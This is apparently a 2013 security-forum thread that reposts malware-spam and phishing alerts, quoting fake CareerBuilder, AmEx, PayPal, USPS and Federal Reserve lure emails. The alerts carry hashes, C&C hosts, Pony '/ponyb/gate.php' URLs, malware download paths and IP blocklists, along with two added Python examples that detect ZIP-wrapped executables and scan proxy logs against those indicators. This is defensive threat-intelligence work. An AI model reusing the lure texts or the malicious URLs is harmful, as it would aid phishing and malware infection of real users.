The attachment CB_Offer_04232013_8817391.zip contains a file called CB_Offer_04232013_8817391.exe with an icon designed to look like a PDF file. Note that the date is encoded into the file and future variants will have a different filename. VirusTotal detections are patchy*... I'm still waiting for some sort of analysis..
MD5 924310716fee707db1ea019c3b4eca56
SHA1 2d0d9c7da13f9ec9e4f49918ae99e9f17505a9cd
SHA256 e66a9c463e3f4eb4ca2994a29ec34e0a021ff2541f6a9647dfd3b9131ba38dd5 "
* https://www.virustotal.com/en/file/e66a9c463e3f4eb4ca2994a29ec34e0a021ff2541f6a9647dfd3b9131ba38dd5/analysis/
File name: CB_Offer_04232013_8817391.exe
Detection ratio: 19/46
Analysis date: 2013-04-24
:mad:
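The CareerBuilder, American Express and DHL mailings above share one attachment pattern: a ZIP whose only member is an executable, often with a date encoded in the file name and a body that promises a PDF. The following is an added example of a mail-gateway check for that pattern; it is not code from the forum thread or the blogs it quotes, the message and ZIP are constructed in memory around a harmless two-byte stub, and the addresses are placeholders.

```python
"""Flag ZIP attachments that hide an executable behind a document-style
mailing, in the style of the CB_Offer_04232013_8817391.zip and
CD0199381-04192013.exe samples discussed above.

Added example; sample message, ZIP and addresses are constructed here.
"""
import io
import re
import zipfile
from email import policy
from email.message import EmailMessage
from email.parser import BytesParser
from typing import Dict, List

EXEC_EXTENSIONS = {".exe", ".scr", ".pif", ".com", ".bat", ".cmd", ".js", ".vbs"}
# MMDDYYYY token as seen in CB_Offer_04232013_8817391.exe and CD0199381-04192013.exe
DATE_TOKEN = re.compile(r"(?<!\d)(0[1-9]|1[0-2])(0[1-9]|[12]\d|3[01])(20\d{2})(?!\d)")


def build_sample_message(zip_name: str, inner_name: str) -> bytes:
    """Construct a look-alike of the CareerBuilder mailing (placeholder addresses)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(inner_name, b"MZ")  # harmless stub standing in for the dropped binary
    msg = EmailMessage()
    msg["From"] = "CareerBuilder <sender@example.invalid>"
    msg["To"] = "recipient@example.invalid"
    msg["Subject"] = "CareerBuilder Notification"
    msg.set_content("You can review the position by downloading the attached PDF file.\n"
                    "Attached file is scanned in PDF format.")
    msg.add_attachment(buf.getvalue(), maintype="application", subtype="zip",
                       filename=zip_name)
    return msg.as_bytes()


def inspect_message(raw: bytes) -> List[Dict]:
    """Return one finding per suspicious archive member (empty list if clean)."""
    findings: List[Dict] = []
    msg = BytesParser(policy=policy.default).parsebytes(raw)
    body_part = msg.get_body(preferencelist=("plain",))
    body_text = body_part.get_content().lower() if body_part is not None else ""
    claims_document = "pdf" in body_text

    for part in msg.iter_attachments():
        name = part.get_filename() or ""
        is_zip = part.get_content_type() == "application/zip" or name.lower().endswith(".zip")
        if not is_zip:
            continue
        payload = part.get_payload(decode=True) or b""
        try:
            zf = zipfile.ZipFile(io.BytesIO(payload))
        except zipfile.BadZipFile:
            findings.append({"attachment": name, "member": None, "reasons": ["unreadable zip"]})
            continue
        for info in zf.infolist():
            member = info.filename
            ext = "." + member.rsplit(".", 1)[-1].lower() if "." in member else ""
            reasons = []
            if ext in EXEC_EXTENSIONS:
                reasons.append("archive contains executable")
                if claims_document:
                    # "Attached file is scanned in PDF format" but the member is an .exe
                    reasons.append("body claims PDF but archive delivers executable")
            if DATE_TOKEN.search(member):
                # per-day rebuilds: the same lure returns with a fresh file name
                reasons.append("date-encoded filename")
            if reasons:
                findings.append({"attachment": name, "member": member, "reasons": reasons})
    return findings


if __name__ == "__main__":
    sample = build_sample_message("CB_Offer_04232013_8817391.zip",
                                  "CB_Offer_04232013_8817391.exe")
    for finding in inspect_message(sample):
        print(finding)
```

Because the date token changes daily, matching on the file-name shape plus the archive content is more durable than matching on any one name or hash from the posts.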
AplusWebMaster
2013-04-24, 15:33
FYI...
Something evil on 151.248.123.170
- http://blog.dynamoo.com/2013/04/something-evil-on-151248123170_24.html
24 April 2013 - "151.248.123.170 (Reg.Ru, Russia) is currently hosting a number of malicious sites being used in injection attacks (example 1*, example 2**). These domains appear to be almost all dynamic DNS domains which I would recommend blocking; I also recommend blocking the IP address. Trying to block individual domains would probably be ineffective.
Recommended blocklist:
151.248.123.170 ..."
(Long list at the dynamoo URL above.)
* http://urlquery.net/search.php?q=151.248.123.170&type=string&start=2013-04-09&end=2013-04-24&max=50
** https://www.virustotal.com/en/ip-address/151.248.123.170/information/
- https://www.google.com/safebrowsing/diagnostic?site=AS:39134
____
Fake American Express SPAM / SecureMail.zip
- http://blog.dynamoo.com/2013/04/american-express-spam_24.html
24 Apr 2013 - "Something bad happened to this spam on the way out from wherever spam emerges from. Still, it contains a malicious attachment which should be avoided.
Date: Wed, 24 Apr 2013 12:59:38 -0500 [13:59:38 EDT]
From: American Express [Christian_Frey @aexp .com]
Subject: Confidential - Secure Message from AMEX
Secure Message The security of your personal information is of the utmost importance to American Express, so we have sent the attached as a secure electronic file.
Note: The attached file contains encrypted data.
If you have any questions, please call us at 800-964-7890, option 3.
Representatives are available to assist you Monday through Thursday between 8:00 a.m. and
8:00 p.m. ET and Friday between 8:00 a.m. and 6:00 p.m. ET. The information contained in this message may be privileged, confidential and protected from
disclosure. If the reader of this message is not the intended recipient, or an employee
or agent responsible for delivering this message to the intended recipient, you are
hereby notified that any dissemination, distribution or copying of this communication is
strictly prohibited.
Thank you,
American Express 2012 American Express Company. All rights reserved...
The attachment SecureMail.zip contains a file called SecureMail.exe with a detection rate of 21/46* at VirusTotal. Comodo CAMAS doesn't tell us much** except that it seems to phone home to angels-mail .com and has the following checksums:
MD5 6870fd8fd2b2bedd83e218d9e7e4de8b
SHA1 4b7a2c0cee63634907c5ccc249c8cd4c0231f03a
SHA256 ac0368159001950e4f62e073a289113c2cab135af9ea0f48f5ca660fb2cb45e3
What about angels-mail .com then? Well, it looks like a legitimate domain hosted on 5.77.45.108 (eUKhost, UK). ThreatExpert gives a bit more information about the traffic, indicating a malicious web site operating on port 8080 on that server. However, the ThreatTrack sandbox comes up with the best analysis, a copy of which can be found here [pdf***].
Recommended blocklist:
5.77.45.108
64.90.61.19
212.58.4.13 ..."
* https://www.virustotal.com/en/file/ac0368159001950e4f62e073a289113c2cab135af9ea0f48f5ca660fb2cb45e3/analysis/1366835710/
File name: SecureMail.exe
Detection ratio: 21/46
Analysis date: 2013-04-24
** http://camas.comodo.com/cgi-bin/submit?file=ac0368159001950e4f62e073a289113c2cab135af9ea0f48f5ca660fb2cb45e3
*** http://www.dynamoo.com/files/analysis_30225_6870fd8fd2b2bedd83e218d9e7e4de8b.pdf
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/6127a47535e97109b89d27a5c3eabc9d/tumblr_inline_mls0os2Q8b1qz4rgp.png
___
"New Secure Message" spam / pricesgettos .info
- http://blog.dynamoo.com/2013/04/new-secure-message-spam-pricesgettosinfo.html
24 Apr 2013 - "This spam leads to malware on pricesgettos .info:
Date: Wed, 24 Apr 2013 16:41:50 +0100 [11:41:50 EDT]
From: Cooper.Anderson @csiweb .com
Subject: New Secure Message Received from Cooper.Anderson @csiweb .com
New Secure Message
Respective [redacted],
You have received a new secure message from Cooper.Anderson @csiweb .com.
If you are using the Secure Message Plugin in Lotus Notes this message will be in your SecureMessages Inbox.
If you are NOT using the Secure Message Plugin, you are able to view it by clicking [redacted] to retrieve your secure message or to begin using the convenient Lotus Notes Plugin.
Sincerely Yours,
CSIe
The link displayed in the email is -fake- and actually goes to a legitimate (but hacked) site and is then forwarded to the Blackhole payload site at [donotclick]pricesgettos .info/news/done-heavy_hall_meant.php (report here*) hosted on the following IPs:
1.235.183.241 (SK Broadband, Korea)
130.239.163.24 (Umea University, Sweden)
155.239.247.247 (Centurion Telkom, South Africa)
202.31.139.173 (Kum oh National University of Technology, Korea)
203.64.101.145 (Taiwan Academic Network, Taiwan)
Blocklist:
1.235.183.241
130.239.163.24
155.239.247.247
202.31.139.173
203.64.101.145 ..."
(More detail at the dynamoo URL above.)
* http://urlquery.net/report.php?id=2157408
... Detected live BlackHole v2.0 exploit kit 203.64.101.145
:mad:
AplusWebMaster
2013-04-25, 20:41
FYI...
Malicious Wire Transfer Spam
- http://threattrack.tumblr.com/post/48854244241/malicious-fiserv-wire-transfer-spam
25 Apr 2013 - "Subjects Seen:
Incoming Transactions Report
Typical e-mail details:
Incoming Transactions Report
An incoming money transfer has been received by your financial institution and the funds deposited to account.
Initiated By: Fiserv Inc.
Initiated Date & Time: Thu, 25 Apr 2013 06:13:22 -0800
Batch ID: 497
Please view the attached file to review the transaction details.
Malicious URLs
lipo-exdenver .com/ponyb/gate.php
lipo-exdallas .com/ponyb/gate.php
mail.yaklasim .com:8080/ponyb/gate.php
angels-mail .com:8080/ponyb/gate.php
serw.myroitracking .com/vHn3xjt.exe
pro-sb-immobilien .de/stdwR8gb.exe
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/90735e07b4bddf240d11afc886a0fc77/tumblr_inline_mltf2pdpru1qz4rgp.png
___
Malicious PayPal Password Reset Spam
- http://threattrack.tumblr.com/post/48865476051/malicious-paypal-password-reset-spam
25 April 2013 - "Subjects Seen:
Reset Yoyr PayPal Password
Typical e-mail details:
Your account would stay frozen untill password reset.
How to reset your PayPal password
Hello [removed],
To get back into your PayPal account, you’ll need to create a new password.
It’s easy:
Click the link below to open a secure browser window.
Confirm that you’re the owner of the account, and then follow the instructions.
Malicious URLs
iremadze .com/wp-content/themes/toolbox/breakingnews.html
it-academy-by-student07 .ru/wp-content/themes/toolbox/breakingnews.html
sub.bestquotesnsayings .com/complaints/or_knew-passed.php
sub.bestquotesnsayings .com/complaints/or_knew-passed.php?kdvawba=mlmr&nlmepj=lwuzwkh
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/f73342253f051b4e9c4f000ef1838da0/tumblr_inline_mltpanjmCg1qz4rgp.png
:mad:
AplusWebMaster
2013-04-26, 13:18
FYI...
Fake USPS SPAM / LABEL-ID-56723547-GFK72.zip
- http://blog.dynamoo.com/2013/04/usps-delivery-failure-report-spam-label.html
26 Apr 2013 - "This fake USPS message has a malicious attachment:
Date: Fri, 26 Apr 2013 12:46:25 +0400 [04:46:25 EDT]
From: USPS client manager Lelia Holden [reports @usps .com]
Subject: USPS delivery failure report
Priority: High Priority 1
Notification
Our company’s courier couldn’t make the delivery of package.
REASON: Postal code contains an error.
LOCATION OF YOUR PARCEL: New York
DELIVERY STATUS: sort order
SERVICE: One-day Shipping
NUMBER OF YOUR PARCEL: UGL38SHK4T
FEATURES: No
Label is enclosed to the letter.
Print a label and show it at your post office.
An additional information:
If the parcel isn’t received within 30 working days our company will have the right to claim compensation from you for it’s keeping in the amount of $8.26 for each day of keeping of it.
You can find the information about the procedure and conditions of parcels keeping in the nearest office.
Thank you for using our services.
USPS Global.
There is an attachment LABEL-ID-56723547-GFK72.zip which in turn contains an executable file LABEL-ID-56723547-GFK72.exe which is designed to look like a PDF file. VirusTotal results are a pretty poor 7/46*.
The malicious binary has the following checksums:
MD5 df81b21e9526c571d03bc1fb189f233c
SHA1 dd2fe390e3f16a7f12786799af927f62df6754c4
SHA256 db001675033574e5291b1717b7b704d43d9bd676604b623f781d2f4cde60590a
Comodo CAMAS reports** some very unusual behaviour around LDAP registry keys, not present in the Anubis report*** or ThreatExpert report****."
* https://www.virustotal.com/en/file/db001675033574e5291b1717b7b704d43d9bd676604b623f781d2f4cde60590a/analysis/1366967613/
File name: LABEL-ID-56753547-GFK72.exe
Detection ratio: 7/46
Analysis date: 2013-04-26
** http://camas.comodo.com/cgi-bin/submit?file=db001675033574e5291b1717b7b704d43d9bd676604b623f781d2f4cde60590a
*** http://anubis.iseclab.org/?action=result&task_id=1e43e149c094e5e5409bc2132b7479096&format=html
**** http://www.threatexpert.com/report.aspx?md5=df81b21e9526c571d03bc1fb189f233c
___
Something evil on 193.107.16.213 / Ideal Solution Ltd
- http://blog.dynamoo.com/2013/04/something-evil-on-19310716213-ideal.html
26 April 2013 - "193.107.16.213 is a web server run by Ideal Solution Ltd in the Seychelles. It contains many malware sites that should be blocked, and you might well want to consider blocking the entire 193.107.16.0/22 (193.107.16.0 - 193.107.19.255) range. VirusTotal detects a number of malicious sites on this server (see report*) but blocking access to this IP address is probably the easiest approach. However there seems to be very little of value in the whole /22 and I have personally had it blocked for some months with no ill effects. The sites that I can identify, their MyWOT ratings and Google prognosis can be downloaded from here [csv**]. Use this data as you see fit..."
(More detail at the dynamoo URL above.)
* https://www.virustotal.com/en/ip-address/199.71.212.122/information/
** http://www.dynamoo.com/files/ideal-solution.csv
- https://www.google.com/safebrowsing/diagnostic?site=AS:58001
___
Something evil on 199.71.212.122
- http://blog.dynamoo.com/2013/04/something-evil-on-19971212122.html
26 April 2013 - "199.71.212.122 is an IP address belonging to Psychz Networks in the US. It hosts a number of sites with malware on them according to VirusTotal* and URLquery**. Some of the malicious domains were recently hosted on this IP. I suspect that there are a lot more domains than the ones listed on this server; blocking access to it is probably the best approach..."
* https://www.virustotal.com/en/ip-address/199.71.212.122/information/
** http://urlquery.net/search.php?q=199.71.212.122&type=string&start=2013-04-11&end=2013-04-26&max=50
- https://www.google.com/safebrowsing/diagnostic?site=AS:40676
___
Malicious PayPal Dispute Spam
- http://threattrack.tumblr.com/post/48936534431/malicious-paypal-dispute-spam
26 April 2013 - "Subjects Seen:
Resolution of case #[removed]
Typical e-mail details:
Our records indicate that you never responded to requests for additional
information about this claim. We hope you review the attached file and solve the situation amicably.
For more details please see the attached file (Case_[removed].zip)
Sincerely,
Protection Services Department
Malicious URLs
angels-mail .com:8080/ponyb/gate.php
mail.yaklasim .com:8080/ponyb/gate.php
palmspringsvacationhomerentals .com/ponyb/gate.php
palmspringsvacationrentalshomes .com/ponyb/gate.php
techsolbowling .com/Ff1.exe
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/d451d84b1198d946c2f25b223956048b/tumblr_inline_mlvfpj56WK1qz4rgp.png
___
Fake BoA malicious SPAM
- http://blog.webroot.com/2013/04/26/cybercriminals-impersonate-bank-of-america-bofa-serve-malware/
April 26, 2013 - "Relying on tens of thousands of fake “Your transaction is completed” emails, cybercriminals have just launched yet another malicious spam campaign attempting to socially engineer Bank of America’s (BofA) customers into executing a malicious attachment. Once unsuspecting users do so, their PCs automatically join the botnet operated by the cybercriminal/gang of cybercriminals operating it, leading to a successful compromise of their hosts...
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2013/04/bank_of_america_bofa_email_spam_social_engineering_malware_malicious_software_botnet.png?w=869
Detection rate for the malicious executable: MD5: c671d0896a2412b42e1abad4be9d43a8 * ...Trojan-Spy.Win32.Zbot.kulh.
... phones back to... C&Cs servers..."
(Long IP list at the webroot URL above.)
* https://www.virustotal.com/en/file/82e6d0f100bcc4b126765a03b245fe7a9c75548946053e1ef644706351f3f838/analysis/
File name: Mnvw57ch.exe
Detection ratio: 32/46
Analysis date: 2013-04-26
:mad:
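The posts above give their indicators defanged (a space before the TLD, a [donotclick] prefix, bare IPs, and in one case a whole /22 range), and the same /ponyb/gate.php path turns up on four different hosts across the Fiserv and PayPal dispute spam. The script below is an added example, not code from dynamoo, ThreatTrack or this thread's author: it refangs those strings into a blocklist (subdomains of a listed host and addresses inside a listed range both match), treats the gate path as a signature in its own right, and runs the result over a few proxy-log lines. The indicator strings are copied from the posts; the log lines, their field layout (timestamp, client, method, URL, status) and the host unlisted-host.example are constructed for the example.

```python
"""Refang the defanged indicators quoted in this thread, build a blocklist
from them, and run it over proxy-log lines.

Added example: not code from dynamoo, ThreatTrack or the thread's author.
The indicator strings are copied from the posts above; the log lines and
their format (timestamp, client, method, URL, status) are constructed."""
import ipaddress
import re
from urllib.parse import urlsplit

RAW_IOCS = [
    "angels-mail .com:8080/ponyb/gate.php",
    "mail.yaklasim .com:8080/ponyb/gate.php",
    "[donotclick]pricesgettos .info/news/done-heavy_hall_meant.php",
    "serw.myroitracking .com/vHn3xjt.exe",
    "5.77.45.108",
    "130.239.163.24",
    "193.107.16.0/22",   # the whole Ideal Solution range, as suggested above
]

# The same gate path appears on four different hosts in the posts above, so it
# is worth matching on its own, independent of the host.
PONY_GATE = re.compile(r"/ponyb/gate\.php$")


def refang(ioc):
    """Undo the defanging used in the posts: '[donotclick]' prefix, a space
    before the TLD ('angels-mail .com'), bracketed dots and hxxp://."""
    ioc = re.sub(r"^\[donotclick\]", "", ioc.strip(), flags=re.I)
    ioc = re.sub(r"\s+\.\s*", ".", ioc)
    ioc = re.sub(r"\[\.\]|\(\.\)|\{\.\}", ".", ioc)
    return re.sub(r"^hxxp", "http", ioc, flags=re.I)


def classify(ioc):
    """Return ('net', ip_network) for an IP or CIDR, else ('host', name, path)."""
    clean = refang(ioc)
    try:
        return ("net", ipaddress.ip_network(clean, strict=False))
    except ValueError:
        pass
    if "://" not in clean:
        clean = "http://" + clean
    parts = urlsplit(clean)
    return ("host", (parts.hostname or "").lower(), parts.path or "/")


class Blocklist:
    def __init__(self, raw_iocs):
        self.networks = []
        self.hosts = {}                 # blocked host -> set of paths seen
        for raw in raw_iocs:
            kind, *rest = classify(raw)
            if kind == "net":
                self.networks.append(rest[0])
            else:
                host, path = rest
                self.hosts.setdefault(host, set()).add(path)

    def match(self, host):
        """Return why `host` (name or IP literal) is blocked, or None."""
        try:
            ip = ipaddress.ip_address(host)
            for net in self.networks:
                if ip in net:
                    return f"ip {ip} in {net}"
            return None
        except ValueError:
            pass
        labels = host.lower().split(".")
        # sub.pricesgettos.info is blocked by the entry for pricesgettos.info
        for i in range(len(labels) - 1):
            candidate = ".".join(labels[i:])
            if candidate in self.hosts:
                return f"host {candidate}"
        return None


def scan_proxy_log(lines, blocklist):
    """Return (line_no, url, reason) for every line that hits the blocklist
    or requests a Pony gate path on any host."""
    hits = []
    for n, line in enumerate(lines, 1):
        fields = line.split()
        if len(fields) < 4:
            continue
        url = fields[3]
        parts = urlsplit(url if "://" in url else "http://" + url)
        reason = blocklist.match(parts.hostname or "")
        if reason is None and PONY_GATE.search(parts.path or ""):
            reason = "pony gate path"
        if reason:
            hits.append((n, url, reason))
    return hits


# Constructed log lines; only the hostnames taken from the posts are real.
SAMPLE_LOG = """\
2013-04-25T13:01:07 10.1.2.3 GET http://www.example.org/index.html 200
2013-04-25T13:01:09 10.1.2.3 POST http://angels-mail.com:8080/ponyb/gate.php 200
2013-04-25T13:01:12 10.1.2.4 GET http://193.107.17.55/promo/ 200
2013-04-25T13:01:15 10.1.2.5 POST http://unlisted-host.example/ponyb/gate.php 404
2013-04-25T13:01:20 10.1.2.6 GET http://sub.pricesgettos.info/news/done-heavy_hall_meant.php 200
""".splitlines()

if __name__ == "__main__":
    for n, url, reason in scan_proxy_log(SAMPLE_LOG, Blocklist(RAW_IOCS)):
        print(f"line {n}: {url}  [{reason}]")
```

Matching on the path alone (line 4 of the sample, a host no post lists) is the part worth keeping when the hosts rotate: the gate path is what the botnet's client keeps using, while the domains in front of it change from campaign to campaign.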
AplusWebMaster
2013-04-30, 13:23
FYI...
Multiple Facebook SCAMS ...
- http://www.hoax-slayer.com/fb-profile-viewer-scam.shtml
April 30, 2013 - "Outline: Message being spammed across Facebook claims that users can follow a link to install an app that allows them to check who has been viewing their profile.
Brief Analysis: The message is an attempt to trick Facebook users into relinquishing control of their Facebook accounts to Internet scammers by submitting their Facebook authentication token. The scammers will use the compromised accounts to launch further spam and scam campaigns in the names of their victims. Any message that claims that you can install an app to see who has viewed your profile is likely to be a scam. Do not click on any links in these messages...
Detailed Analysis: This message, which is currently appearing on Facebook, claims that users can check out who has been viewing their Facebook profiles by clicking a link and installing a new app.
However, the message is a scam designed to trick users into temporarily handing control of their Facebook accounts to online scammers. Those who click the link will first be taken to a Facebook page with further "instructions" for procuring the app:
> http://www.hoax-slayer.com/images/fb-profile-viewer-scam-1.jpg
If victims follow the link on the page, they will next be taken to a second page that falsely claims that Facebook is now required to show users who has been viewing their profile:
> http://www.hoax-slayer.com/images/fb-profile-viewer-scam-2.jpg
Next, victims are taken to a "security check" and told that they must generate an "age verification code" before proceeding:
> http://www.hoax-slayer.com/images/fb-profile-viewer-scam-3.jpg
Users will then receive the following instructions:
> http://www.hoax-slayer.com/images/fb-profile-viewer-scam-4.jpg
Followed by this:
> http://www.hoax-slayer.com/images/fb-profile-viewer-scam-5.jpg
... by pasting the "age verification" code as instructed, users are in fact giving the scammers access to their Facebook accounts, including their Friends list. The code is the victim's Facebook authentication token, which can then be used by the criminals to temporarily hijack the Facebook account. The compromised accounts are then used to distribute more of the same scam messages on Facebook... victims will be taken onward to various bogus survey pages and enticed to participate, supposedly as a further prerequisite to getting the promised profile viewer app... In reality, the profile viewer app does not exist... Some versions use the promise of a profile viewer to lead victims directly to a scam survey page. Other versions try to trick users into first installing a rogue Facebook application that will send spam and scam messages to all of their friends.
Do not trust any message that claims that you can click a link and install an app to see who has viewed your profile. If you receive such a message, delete it."
___
UK banks targeted with Trojans and social engineering
- https://www.net-security.org/malware_news.php?id=2477
April 30, 2013 - "... Trusteer’s security team recently analyzed a Ramnit variant that is targeting a UK bank with a clever one-time password (OTP) scam. The malware stays idle until the user successfully logs into their account, at which time it presents them with one of the following messages:
> https://www.net-security.org/images/articles/trusteer-042013-1.jpg
- or:
> https://www.net-security.org/images/articles/trusteer-042013-2.jpg
While the user is reading the message, Ramnit connects to its command and control server and obtains the details of a designated mule account. This is followed by the initiation of a wire transfer to the money mule. But, there is still one more obstacle in the way of the malware – to complete the transaction a One Time Password (OTP) must be entered by the user. To overcome this requirement Ramnit displays the following message:
> https://www.net-security.org/images/articles/trusteer-042013-3.jpg
The temporary receiver number in the message is in fact the mule’s account number. The user then receives the SMS and, thinking that they must complete the “OTP service generation”, enters their OTP. By entering the OTP, the user unknowingly enables the malware to complete the fraudulent transaction and finalize the payment to the mule account. This is yet another example of how well designed social engineering techniques help streamline the fraud process... the authors most likely used ‘find and replace’ to switch the two words that resulted in the grammatical mistake “a option.” Nevertheless, by changing multiple entries in the FAQ section Ramnit* demonstrates that its authors did not leave anything to chance – even if the victim decides to go the extra step, Ramnit is already there..."
* http://www.trusteer.com/blog/ramnit-evolution-%E2%80%93-worm-financial-malware
___
Malicious PDFs on the rise
- http://blog.trendmicro.com/trendlabs-security-intelligence/malicious-pdfs-on-the-rise/
Apr 29, 2013 - "... we continue to see CVE-2012-0158 in heavy use, we have noticed increasing use of an exploit for Adobe Reader (CVE-2013-0640)... files used dnsport.chatnook .com, inter.so-webmail .com, and 223.25.242.45 as their command-and-control servers... Our research indicates that attackers engaged in APT campaigns may have adapted the exploit made infamous by the MiniDuke campaign and have incorporated it into their arsenal. At the same time, we have found that other APT campaigns seem to have developed their own methods to exploit the same vulnerability. The increase in malicious PDFs exploiting CVE-2013-0640 may indicate the start of a shift in APT attacker behavior away from using malicious Word documents that exploit the now quite old CVE-2012-0158."
(More detail at the trendmicro URL above.)
- https://blogs.technet.com/b/mmpc/archive/2013/04/29/the-rise-in-the-exploitation-of-old-pdf-vulnerabilities.aspx?Redirected=true
29 Apr 2013
Graph: https://www.microsoft.com/security/portal/blog-images/pdf_exploits/2.png
___
Phish target Apple IDs
- http://blog.trendmicro.com/trendlabs-security-intelligence/hackers-to-manage-your-apple-id-if-caught-from-phishing-bait/
Apr 30, 2013 - "Phishers appear to have concentrated their fire on a relatively new target: Apple IDs. In recent days, we’ve seen a spike in phishing sites that try to steal Apple IDs... Technically, the sites were only compromised, but not hacked (as the original content was not modified). It’s possible, however, that the sites may be hacked or defaced if the site stays compromised... the directory contains pages that spoof the Apple ID login page fairly closely:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2013/04/fake_apple.jpg
We’ve identified a total of 110 compromised sites, all of them hosted at the IP address 70.86.13.17, which is registered to an ISP in the Houston area. Almost all of these sites have not been cleaned:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2013/04/chart.png
The graph above shows the increase in phishing sites targeting Apple IDs. We’ve seen attacks targeting not only American users, but also British and French users. Some versions of this attack ask not only for the user’s Apple ID login credentials, but also their billing address and other personal and credit card information. It will eventually result in a page that states that access has been restored, but of course the information has been stolen. One can see in the sample page below how it asks for credit card information:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2013/04/apple_credit_card.jpg
Users may be redirected to these phishing sites via spam messages that state that the user’s account will expire unless their information is subject to an “audit”, which not only gets users to click on the link, it puts them in a mindset willing to give up information.
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2013/04/apple_mail.jpg
One way to identify these phishing sites is that the fake sites do not display any indications that you are at a secure site (like the padlock and “Apple Inc. ” part of the toolbar), which you can see in this screenshot of the legitimate site:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2013/04/legitsite.jpg
The screenshot above is from Chrome, but Internet Explorer and Firefox both have similar ways to indicate secure sites. For the phishing messages themselves, legitimate messages should generally have matching domains all around – where they were sent from, where any links go to, etcetera. Mere appearance of the email isn’t enough to judge, as very legitimate-looking emails have been used maliciously. We also encourage users to enable the two-factor authentication that Apple ID recently introduced, for added protection..."
___
Something evil on 96.126.108.132
- http://blog.dynamoo.com/2013/04/something-evil-on-96126108132.html
30 April 2013 - "These sites are on (or are likely to be created on) 96.126.108.132 (Linode, US) which is a known malware server [1] [2] [3]. Blocking this IP would be wise. Some of the domains are rather.. unusual ;) ..."
(Long list at the dynamoo URL above.)
1) https://www.virustotal.com/en/ip-address/96.126.108.132/information/
2) https://palevotracker.abuse.ch/?ipaddress=96.126.108.132
3) http://support.clean-mx.de/clean-mx/viruses.php?sort=firstseen%20desc&review=96.126.108.132
___
Fake "Requested Reset of Yoyr PayPal Password" SPAM / frustrationpostcards .biz
- http://blog.dynamoo.com/2013/04/requested-reset-of-yoyr-paypal-password.html
29 Apr 2013 - "This fake PayPal spam leads to malware on frustrationpostcards .biz:
Date: Mon, 29 Apr 2013 13:22:03 -0500
From: "service @paypalmail .com" [chichisaq0 @emlreq.paypalmail .com]
Subject: Requested Reset of Yoyr PayPal Password
Your account will stay on hold untill password reset.
How to reset your PayPal password
Hello [redacted],
To get back into your PayPal account, you'll have to create a new password.
It's easy:
Click the link below to open a secure browser window.
Confirm that you're the owner of the account, and then follow the instructions.
Reset your password now
If you didn't requested help with your password, let us know immediately. Reporting it is important because it helps us prevent fraudsters from stealing your information.
Help Center | Security Center
Please don't reply to this email. It'll just confuse the computer that sent it and you won't get a response.
Copyright © 2013 PayPal, Inc. All rights reserved. PayPal is located at 2211 N. First St., San Jose, CA 95132.
PayPal Email ID 2A7X1
The link goes through a legitimate but hacked site to land on a malicious payload at [donotclick]frustrationpostcards .biz/news/institutions-trusted.php (report here*) hosted on the following IPs:
82.236.38.147 (PROXAD Free SAS, France)
83.212.110.172 (Greek Research and Technology Network, Greece)
130.239.163.24 (Umea University, Sweden)...
Blocklist:
82.236.38.147
83.212.110.172
130.239.163.24 ..."
* http://urlquery.net/report.php?id=2230181
Screenshot: https://www.net-security.org/images/articles/pp-fake-30042013.jpg
___
Fake Wire Transfer SPAM / Payment reeceipt.exe / 78.139.187.6
- http://blog.dynamoo.com/2013/04/your-wire-transfer-82932922-canceled.html
30 Apr 2013 - "This fake wire transfer spam comes with a malicious attachment:
Date: Tue, 30 Apr 2013 15:27:44 -0500 [16:27:44 EDT]
From: Federal Reserve [alerts @federalreserve .gov]
Subject: Your Wire Transfer 82932922 canceled
The Wire transfer , recently sent from your bank account , was not processed by the FedWire.
Transfer details attached to the letter.
This service is provided to you by the Federal Reserve Board. Visit us on the web at website
To report this message as spam, offensive, or if you feel you have received this in error, please send e-mail to email address including the entire contents and subject of the message. It will be reviewed by staff and acted upon appropriately
In this case there is an attachment PAYMENT RECEIPT 30-04-2013-GBK-75.zip which contains a malicious executable crafted to look like a Word document called Payment reeceipt.exe . This executable has a so-so VirusTotal detection rate of 29/46*.
The malware has the following checksums according to Comodo CAMAS**:
Size 371712
MD5 0a3723483e06dcf7e51073972b9d1ef3
SHA1 293735a9fdc7e786b12c2ef92f544ffc53a0a0e7
SHA256 0eb5dd62e32bc6480bae638967320957419ba70330f0b9ad5759c2d3f25753dd
Anubis has a pretty detailed report*** of what this malware does. In particular, you might want to monitor network traffic to and from 78.139.187.6 (Caucasus Online, Georgia) which seems to be a C&C server. This IP has also been seen here****. There are several other IPs involved, but these look like DSL subscribers with dynamic addresses, so probably a part of a botnet. For the sake of completeness they are:
64.231.249.250
69.183.226.70
78.139.187.6
81.133.189.232
123.237.234.67 ...."
* https://www.virustotal.com/en/file/0eb5dd62e32bc6480bae638967320957419ba70330f0b9ad5759c2d3f25753dd/analysis/1367354089/
File name: Payment reeceipt.exe
Detection ratio: 29/46
Analysis date: 2013-04-30
** http://camas.comodo.com/cgi-bin/submit?file=0eb5dd62e32bc6480bae638967320957419ba70330f0b9ad5759c2d3f25753dd
*** http://anubis.iseclab.org/?action=result&task_id=11c3b00f56c0bd214cda8762fb407b4fd&format=html
**** http://blog.dynamoo.com/2013/04/fiserv-secure-email-notification-spam.html
:mad: :sad:
AplusWebMaster
2013-05-04, 04:56
FYI...
Malicious ADP Delivery Notice Spam
- http://threattrack.tumblr.com/post/49528975188/malicious-adp-delivery-notice-spam
3 May 2013 - "Subjects Seen:
ADP Chesapeake - Package Delivery Confirmation
Typical e-mail details:
This message is to notify you that your package has been processed and is on schedule for delivery from ADP.
Here are the details of your delivery:
Package Type: QTR/YE Reporting
Courier: UPS Ground
Estimated Time of Arrival: Monday, 1:00pm
Tracking Number (if one is available for this package): [removed]
Details: Click here to overview and/or modify order
We will notify you via email if the status of your delivery changes.
Access these and other valuable tools at support.ADP.com:
Payroll and Tax Calculators
Order Payroll Supplies, Blank Checks, and more
Submit requests online such as SUI Rate Changes, Schedule Changes, and more
Download Product Documentation, Manuals, and Forms
